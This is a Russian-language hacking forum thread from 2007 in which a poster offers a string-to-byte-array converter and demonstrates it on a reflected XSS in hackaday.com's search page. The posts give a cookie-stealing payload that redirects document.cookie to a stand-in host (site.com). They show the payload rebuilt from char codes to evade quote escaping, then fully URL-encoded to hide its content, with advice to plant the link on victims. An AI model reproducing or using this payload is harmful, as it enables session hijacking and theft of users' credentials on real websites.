Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
17.06.2007, 08:28
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
String To Buffer
Написал небольшую утилитку для перевода строки в массив байт. Пока поддерживает синтаксисы MySQL, JavaScript, Delphi. А также URL и HTML Encode. Дальше больше.
Иногда помогает 
скачать |
|
|
30.06.2007, 06:12
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Обновил программу. Добавил парочку новых функций. Ссылка в первом посте
Покажу пример, в случае которого может пригодиться моя программа. Беру последнюю XSS из соответствующего раздела:
http://www.hackaday.com/search/?q="><script>alert(/XSS/)</script>
К примеру, мне нужно увести кукисы с данного сайта. Я делаю ссылку вида
http://www.hackaday.com/search/?q="><script>location.href='http://site.com?cookie='+document.cookie</script>
или
Код:
http://www.hackaday.com/search/?q=%22%3e%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%27%68%74%74%70%3a%2f%2f%73%69%74%65%2e%63%6f%6d%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
Но данный скрипт работать не будет, так как на сервере экранируются кавычки.
Я включю свою прогу, ввожу строку
http://site.com?cookie=
Конвертирую в JS буффер. Получаю:
buf = new Array(0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x73,0x69 ,0x74,0x65,0x2e,0x63,0x6f,0x6d,0x3f,0x63,0x6f,0x6f ,0x6b,0x69,0x65,0x3d);
buffer = new String();
for (i=0;i<buf.length;i++)
buffer += String.fromCharCode(buf[i]);
Дополняю скриптом и привожу к виду XSS:
http://www.hackaday.com/search/?q="><script>buf=new Array(0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x73,0x69 ,0x74,0x65,0x2e,0x63,0x6f,0x6d,0x3f,0x63,0x6f,0x6f ,0x6b,0x69,0x65,0x3d);buffer=new String();for (i=0;i<buf.length;i++) buffer+=String.fromCharCode(buf[i]);location.href=buffer+document.cookie</script>
И, наконец, скрываю что там содержится:
Код:
http://www.hackaday.com/search/?q=%22%3e%3c%73%63%72%69%70%74%3e%62%75%66%3d%6e%65%77%20%41%72%72%61%79%28%30%78%36%38%2c%30%78%37%34%2c%30%78%37%34%2c%30%78%37%30%2c%30%78%33%61%2c%30%78%32%66%2c%30%78%32%66%2c%30%78%37%33%2c%30%78%36%39%2c%30%78%37%34%2c%30%78%36%35%2c%30%78%32%65%2c%30%78%36%33%2c%30%78%36%66%2c%30%78%36%64%2c%30%78%33%66%2c%30%78%36%33%2c%30%78%36%66%2c%30%78%36%66%2c%30%78%36%62%2c%30%78%36%39%2c%30%78%36%35%2c%30%78%33%64%29%3b%62%75%66%66%65%72%3d%6e%65%77%20%53%74%72%69%6e%67%28%29%3b%66%6f%72%20%28%69%3d%30%3b%69%3c%62%75%66%2e%6c%65%6e%67%74%68%3b%69%2b%2b%29%20%62%75%66%66%65%72%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%62%75%66%5b%69%5d%29%3b%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%62%75%66%66%65%72%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
Все, осталось только грамотно подкинуть ссылку
Последний раз редактировалось begin end; 30.06.2007 в 12:16..
|
|
|
|
30.06.2007, 11:22
|
|
Постоянный
Регистрация: 19.06.2007
Сообщений: 315
Провел на форуме:
1174546
Репутация:
326
|
|
спс ! я что подобное делал на РНР
Нужная штука ...
Много раз выручала ! |
|
|
|
03.09.2007, 19:24
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
